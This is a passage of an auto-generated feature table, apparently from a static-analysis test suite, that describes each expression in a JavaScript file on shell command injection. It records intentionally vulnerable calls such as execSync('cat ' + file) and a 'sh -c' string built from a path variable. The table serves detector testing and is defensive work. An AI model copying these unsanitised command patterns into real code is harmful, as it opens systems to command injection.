autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:14:50:17 | file | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:16 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:16 | execSync | contextSurroundingFunctionParameters | (file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:16 | execSync | enclosingFunctionBody | file execSync cat file toString | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:16 | execSync | enclosingFunctionName | cat | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:16 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:31 | exceptional return of execSyn ... + file) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:31 | exceptional return of execSyn ... + file) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:31 | exceptional return of execSyn ... + file) | enclosingFunctionBody | file execSync cat file toString | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:31 | exceptional return of execSyn ... + file) | enclosingFunctionName | cat | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:31 | exceptional return of execSyn ... + file) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:31 | execSyn ... + file) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:31 | execSyn ... + file) | contextSurroundingFunctionParameters | (file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:31 | execSyn ... + file) | enclosingFunctionBody | file execSync cat file toString | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:31 | execSyn ... + file) | enclosingFunctionName | cat | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:31 | execSyn ... + file) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:40 | execSyn ... oString | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:40 | execSyn ... oString | contextSurroundingFunctionParameters | (file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:40 | execSyn ... oString | enclosingFunctionBody | file execSync cat file toString | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:40 | execSyn ... oString | enclosingFunctionName | cat | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:40 | execSyn ... oString | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:42 | exceptional return of execSyn ... tring() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:42 | exceptional return of execSyn ... tring() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:42 | exceptional return of execSyn ... tring() | enclosingFunctionBody | file execSync cat file toString | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:42 | exceptional return of execSyn ... tring() | enclosingFunctionName | cat | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:42 | exceptional return of execSyn ... tring() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:42 | execSyn ... tring() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:42 | execSyn ... tring() | contextSurroundingFunctionParameters | (file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:42 | execSyn ... tring() | enclosingFunctionBody | file execSync cat file toString | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:42 | execSyn ... tring() | enclosingFunctionName | cat | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:42 | execSyn ... tring() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:18:51:23 | 'cat ' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:18:51:23 | 'cat ' | contextSurroundingFunctionParameters | (file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:18:51:23 | 'cat ' | enclosingFunctionBody | file execSync cat file toString | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:18:51:23 | 'cat ' | enclosingFunctionName | cat | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:18:51:23 | 'cat ' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:18:51:23 | 'cat ' | stringConcatenatedWith | -endpoint- file | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:18:51:30 | 'cat ' + file | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:18:51:30 | 'cat ' + file | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:18:51:30 | 'cat ' + file | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:18:51:30 | 'cat ' + file | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:18:51:30 | 'cat ' + file | contextSurroundingFunctionParameters | (file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:18:51:30 | 'cat ' + file | enclosingFunctionBody | file execSync cat file toString | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:18:51:30 | 'cat ' + file | enclosingFunctionName | cat | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:18:51:30 | 'cat ' + file | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:27:51:30 | file | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:27:51:30 | file | contextSurroundingFunctionParameters | (file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:27:51:30 | file | enclosingFunctionBody | file execSync cat file toString | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:27:51:30 | file | enclosingFunctionName | cat | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:27:51:30 | file | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:27:51:30 | file | stringConcatenatedWith | 'cat ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:33:51:40 | toString | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:33:51:40 | toString | contextSurroundingFunctionParameters | (file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:33:51:40 | toString | enclosingFunctionBody | file execSync cat file toString | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:33:51:40 | toString | enclosingFunctionName | cat | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:33:51:40 | toString | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:1:54:8 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:1:54:8 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:1:54:8 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:1:54:39 | exceptional return of execSyn ... + "'") | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:1:54:39 | exceptional return of execSyn ... + "'") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:1:54:39 | exceptional return of execSyn ... + "'") | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:1:54:39 | execSyn ... + "'") | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:1:54:39 | execSyn ... + "'") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:1:54:39 | execSyn ... + "'") | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:10:54:22 | "sh -c 'cat " | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:10:54:22 | "sh -c 'cat " | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:10:54:22 | "sh -c 'cat " | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:10:54:22 | "sh -c 'cat " | stringConcatenatedWith | -endpoint- newpath + ''' | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:10:54:32 | "sh -c ... newpath | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:10:54:32 | "sh -c ... newpath | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:10:54:32 | "sh -c ... newpath | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:10:54:38 | "sh -c ... h + "'" | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:10:54:38 | "sh -c ... h + "'" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:10:54:38 | "sh -c ... h + "'" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:10:54:38 | "sh -c ... h + "'" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:10:54:38 | "sh -c ... h + "'" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:10:54:38 | "sh -c ... h + "'" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:26:54:32 | newpath | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:26:54:32 | newpath | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:26:54:32 | newpath | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:26:54:32 | newpath | stringConcatenatedWith | 'sh -c 'cat ' -endpoint- ''' | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:36:54:38 | "'" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:36:54:38 | "'" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:36:54:38 | "'" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:36:54:38 | "'" | stringConcatenatedWith | 'sh -c 'cat ' + newpath -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:5:56:12 | execFile | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:5:56:12 | execFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:5:56:12 | execFile | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:5:56:37 | execFil ... xecFile | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:5:56:37 | execFil ... xecFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:5:56:37 | execFil ... xecFile | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:5:56:37 | execFile | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:5:56:37 | execFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:5:56:37 | execFile | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:16:56:28 | child_process | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:16:56:28 | child_process | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:16:56:28 | child_process | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:16:56:37 | child_p ... xecFile | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:16:56:37 | child_p ... xecFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:16:56:37 | child_p ... xecFile | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:30:56:37 | execFile | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:30:56:37 | execFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:56:30:56:37 | execFile | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:5:57:16 | execFileSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:5:57:16 | execFileSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:5:57:16 | execFileSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:5:57:45 | execFil ... ileSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:5:57:45 | execFil ... ileSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:5:57:45 | execFil ... ileSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:5:57:45 | execFileSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:5:57:45 | execFileSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:5:57:45 | execFileSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:20:57:32 | child_process | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:20:57:32 | child_process | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:20:57:32 | child_process | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:20:57:45 | child_p ... ileSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:20:57:45 | child_p ... ileSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:20:57:45 | child_p ... ileSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:34:57:45 | execFileSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:34:57:45 | execFileSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:57:34:57:45 | execFileSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:1:59:8 | execFile | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:1:59:8 | execFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:1:59:8 | execFile | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:1:62:2 | exceptional return of execFil ... ut);\\n}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:1:62:2 | exceptional return of execFil ... ut);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:1:62:2 | exceptional return of execFil ... ut);\\n}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:1:62:2 | execFil ... ut);\\n}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:1:62:2 | execFil ... ut);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:1:62:2 | execFil ... ut);\\n}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:10:59:19 | '/bin/cat' | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:10:59:19 | '/bin/cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:10:59:19 | '/bin/cat' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:10:59:19 | '/bin/cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:10:59:19 | '/bin/cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:10:59:19 | '/bin/cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:22:59:34 | [ 'pom.xml' ] | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:22:59:34 | [ 'pom.xml' ] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:22:59:34 | [ 'pom.xml' ] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:22:59:34 | [ 'pom.xml' ] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:22:59:34 | [ 'pom.xml' ] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:22:59:34 | [ 'pom.xml' ] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:24:59:32 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:24:59:32 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:24:59:32 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:24:59:32 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:24:59:32 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:24:59:32 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:59:36 | this | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:59:36 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:59:36 | this | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:59:36 | this | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:59:36 | this | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | 'arguments' object of anonymous function | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | 'arguments' object of anonymous function | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | exceptional return of anonymous function | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | exceptional return of anonymous function | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | functio ... out);\\n} | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | functio ... out);\\n} | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | functio ... out);\\n} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | functio ... out);\\n} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | functio ... out);\\n} | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | functio ... out);\\n} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | return of anonymous function | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | return of anonymous function | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:37:62:1 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:46:59:50 | error | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:46:59:50 | error | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:46:59:50 | error | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:46:59:50 | error | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:46:59:50 | error | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:53:59:58 | stdout | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:53:59:58 | stdout | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:53:59:58 | stdout | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:53:59:58 | stdout | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:53:59:58 | stdout | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:53:59:58 | stdout | 